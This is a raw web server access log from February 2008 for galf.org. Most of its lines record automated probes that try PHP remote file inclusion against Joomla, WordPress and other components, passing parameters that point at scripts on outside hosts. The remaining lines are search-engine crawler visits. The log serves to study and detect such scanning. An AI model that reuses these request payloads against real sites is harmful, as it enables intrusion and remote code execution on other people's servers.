208.113.221.15 - - [10/Feb/2008:22:07:37 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:37 -0800] "GET /logs/access_070709.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:38 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:38 -0800] "GET /logs/access_070806.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:38 -0800] "GET /logs/access_070709.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:38 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:40 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:42 -0800] "GET /logs/access_070806.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:44 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.113.221.15 - - [10/Feb/2008:22:07:46 -0800] "GET /logs/access_070806.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://afintra.com/language/lang/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.19.236.98 - - [10/Feb/2008:22:09:21 -0800] "GET /logs/access_070709.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.19.236.98 - - [10/Feb/2008:22:09:22 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.19.236.98 - - [10/Feb/2008:22:12:14 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.102.10.26 - - [10/Feb/2008:22:17:28 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.102.10.26 - - [10/Feb/2008:22:17:28 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
76.76.13.95 - - [10/Feb/2008:22:21:44 -0800] "GET /logs//?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 200 6062 "-" "libwww-perl/5.808" "www.galf.org"
76.76.13.95 - - [10/Feb/2008:22:21:44 -0800] "GET //?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
208.99.194.216 - - [10/Feb/2008:22:23:06 -0800] "GET /logs//?mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 200 6062 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
208.99.194.216 - - [10/Feb/2008:22:23:07 -0800] "GET //?mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
69.9.129.6 - - [10/Feb/2008:22:23:13 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.directwebsite.org/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [10/Feb/2008:22:23:13 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.directwebsite.org/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.190.193.116 - - [10/Feb/2008:22:23:29 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "galf.org"
80.190.193.116 - - [10/Feb/2008:22:23:29 -0800] "GET /logs/access.log/errors.php?error=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "galf.org"
80.190.193.116 - - [10/Feb/2008:22:23:30 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "galf.org"
80.190.193.116 - - [10/Feb/2008:22:23:30 -0800] "GET /errors.php?error=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "galf.org"
80.190.193.116 - - [10/Feb/2008:22:23:30 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "galf.org"
80.190.193.116 - - [10/Feb/2008:22:23:30 -0800] "GET /logs/errors.php?error=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "galf.org"
69.93.173.100 - - [10/Feb/2008:22:23:51 -0800] "GET //?mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
69.93.173.100 - - [10/Feb/2008:22:23:51 -0800] "GET /logs//?mosConfig_absolute_path=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 200 6062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
222.127.228.6 - - [10/Feb/2008:22:25:12 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/3.0 (compatible)" "www.galf.org"
83.19.236.98 - - [10/Feb/2008:22:27:39 -0800] "GET /logs/access_070709.log//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.19.236.98 - - [10/Feb/2008:22:27:40 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://users.volja.net/kcukd/60.php?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:22:27:44 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:22:27:46 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
74.6.7.117 - - [10/Feb/2008:22:30:17 -0800] "GET /cendoc/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
206.221.184.180 - - [10/Feb/2008:22:31:21 -0800] "GET /logs/access_070806.log/index1.php?dat=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.221.184.180 - - [10/Feb/2008:22:31:22 -0800] "GET /index1.php?dat=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.221.184.180 - - [10/Feb/2008:22:31:22 -0800] "GET /logs/index1.php?dat=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:22:33:25 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:22:33:26 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
74.6.25.160 - - [10/Feb/2008:22:34:48 -0800] "GET /cendoc/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:22:44:41 -0800] "GET /logs/access_070806.log/database.php?mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:22:44:41 -0800] "GET /database.php?mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:22:44:41 -0800] "GET /logs/database.php?mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:22:44:49 -0800] "GET /logs/database.php?mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:22:44:49 -0800] "GET /database.php?mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.75.63.66 - - [10/Feb/2008:22:45:49 -0800] "GET /logs/access_070806.log/index1.php?dat=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.63.66 - - [10/Feb/2008:22:45:49 -0800] "GET /index1.php?dat=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.63.66 - - [10/Feb/2008:22:45:50 -0800] "GET /logs/index1.php?dat=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:22:46:00 -0800] "GET /logs/access_070917.log/database.php?mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.164.74 - - [10/Feb/2008:22:46:06 -0800] "GET /database.php?mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.203.143.131 - - [10/Feb/2008:22:47:05 -0800] "GET /logs/access_070806.log/index1.php?dat=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.203.143.131 - - [10/Feb/2008:22:47:06 -0800] "GET /index1.php?dat=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.203.143.131 - - [10/Feb/2008:22:47:06 -0800] "GET /logs/index1.php?dat=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.203.143.131 - - [10/Feb/2008:22:47:09 -0800] "GET /logs/access_070917.log/index1.php?dat=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.171.48.7 - - [10/Feb/2008:22:48:01 -0800] "GET /logs/access_070806.log/index1.php?dat=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.171.48.7 - - [10/Feb/2008:22:48:02 -0800] "GET /index1.php?dat=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.171.48.7 - - [10/Feb/2008:22:48:02 -0800] "GET /logs/index1.php?dat=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.24.226 - - [10/Feb/2008:22:50:10 -0800] "GET /logs/ HTTP/1.0" 200 5927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:22:50:12 -0800] "GET /show.php?path=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:22:50:12 -0800] "GET /logs/show.php?path=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
74.6.28.31 - - [10/Feb/2008:22:53:11 -0800] "GET /logs/access_080128.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:22:56:45 -0800] "GET /index.php?meio=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
208.68.175.66 - - [10/Feb/2008:22:56:45 -0800] "GET /logs/index.php?meio=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
210.66.146.133 - - [10/Feb/2008:22:57:11 -0800] "GET /logs/access_070709.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.3rdcoastcustoms.biz/1photos/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.66.146.133 - - [10/Feb/2008:22:57:13 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.3rdcoastcustoms.biz/1photos/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.66.146.133 - - [10/Feb/2008:22:57:14 -0800] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.3rdcoastcustoms.biz/1photos/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.9.129.6 - - [10/Feb/2008:22:59:30 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.directwebsite.org/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.55.208.229 - - [10/Feb/2008:23:02:36 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.229 - - [10/Feb/2008:23:02:36 -0800] "GET /labia/?M=A HTTP/1.1" 200 524 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
74.6.25.80 - - [10/Feb/2008:23:07:17 -0800] "GET /cendoc/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.24.213 - - [10/Feb/2008:23:10:31 -0800] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
193.252.3.200 - - [10/Feb/2008:23:19:44 -0800] "GET /logs/access.log//admin/includes/admin_header.php?level=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
193.252.3.200 - - [10/Feb/2008:23:19:48 -0800] "GET //admin/includes/admin_header.php?level=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
193.252.3.200 - - [10/Feb/2008:23:19:48 -0800] "GET /logs//admin/includes/admin_header.php?level=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
65.55.208.229 - - [10/Feb/2008:23:24:14 -0800] "GET /?N=A HTTP/1.1" 200 1048 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.69.254.243 - - [10/Feb/2008:23:33:37 -0800] "GET /logs/access_070806.loghttp://zaperyan1918moon.chat.ru/html/aboutme? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.galf.org"
87.106.131.26 - - [10/Feb/2008:23:38:33 -0800] "GET /index.php?option=com_serverstat&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
87.106.131.26 - - [10/Feb/2008:23:38:33 -0800] "GET /logs/index.php?option=com_serverstat&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
211.115.89.60 - - [10/Feb/2008:23:40:04 -0800] "GET /logs/access_070709.log//inc.php?inc=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.115.89.60 - - [10/Feb/2008:23:40:26 -0800] "GET //inc.php?inc=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.115.89.60 - - [10/Feb/2008:23:40:35 -0800] "GET /logs//inc.php?inc=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.131.26 - - [10/Feb/2008:23:41:59 -0800] "GET /logs/index.php?option=com_serverstat&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "galf.org"
87.106.131.26 - - [10/Feb/2008:23:41:59 -0800] "GET /index.php?option=com_serverstat&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "galf.org"
74.6.26.29 - - [10/Feb/2008:23:42:22 -0800] "GET /labia/?N=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
83.142.25.74 - - [10/Feb/2008:23:42:23 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.galf.org"
83.142.25.74 - - [10/Feb/2008:23:42:26 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.galf.org"
206.196.111.182 - - [10/Feb/2008:23:42:30 -0800] "GET / HTTP/1.0" 200 1032 "http://tagsdir.org/directory/" "tagsdir.org/0.8 (+http://tagsdir.org/directory/)" "www.galf.org"
193.252.3.200 - - [10/Feb/2008:23:42:30 -0800] "GET /logs/access_070709.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.252.3.200 - - [10/Feb/2008:23:42:32 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.252.3.200 - - [10/Feb/2008:23:42:32 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.28.223 - - [10/Feb/2008:23:42:37 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.19.148 - - [10/Feb/2008:23:44:43 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.106.73.165 - - [10/Feb/2008:23:45:17 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://crank.idoo.com/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
87.106.73.165 - - [10/Feb/2008:23:45:17 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://crank.idoo.com/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
74.6.23.24 - - [10/Feb/2008:23:46:03 -0800] "GET /?D=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.151.23.213 - - [10/Feb/2008:23:49:14 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.matchingplace.com/site/images/stories/MF/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.151.23.213 - - [10/Feb/2008:23:49:14 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.matchingplace.com/site/images/stories/MF/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.252.3.200 - - [10/Feb/2008:23:49:16 -0800] "GET /logs/access_070806.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.55.208.230 - - [10/Feb/2008:23:50:13 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.230 - - [10/Feb/2008:23:50:13 -0800] "GET /logs/?D=A HTTP/1.1" 200 5943 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
74.6.24.101 - - [10/Feb/2008:23:54:19 -0800] "GET /logs/?D=A HTTP/1.0" 200 6041 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.232.212.210 - - [10/Feb/2008:23:54:27 -0800] "GET / HTTP/1.1" 200 1048 "http://o-db.com/en/dictionary/french_english/apres_la_fermeturela_nuit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)" "galf.org"
82.102.10.26 - - [10/Feb/2008:23:54:56 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
82.102.10.26 - - [10/Feb/2008:23:54:56 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
82.102.10.26 - - [10/Feb/2008:23:54:56 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://beverlyannhope.org//images/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
163.19.117.1 - - [11/Feb/2008:00:00:16 -0800] "GET /logs/access_070917.log/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
163.19.117.1 - - [11/Feb/2008:00:00:16 -0800] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
163.19.117.1 - - [11/Feb/2008:00:00:17 -0800] "GET /logs/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.55.166.250 - - [11/Feb/2008:00:01:20 -0800] "GET /logs/access_070917.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.55.166.250 - - [11/Feb/2008:00:01:20 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.55.166.250 - - [11/Feb/2008:00:01:20 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.9.152.104 - - [11/Feb/2008:00:01:42 -0800] "GET /index.php?option=com_serverstat&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
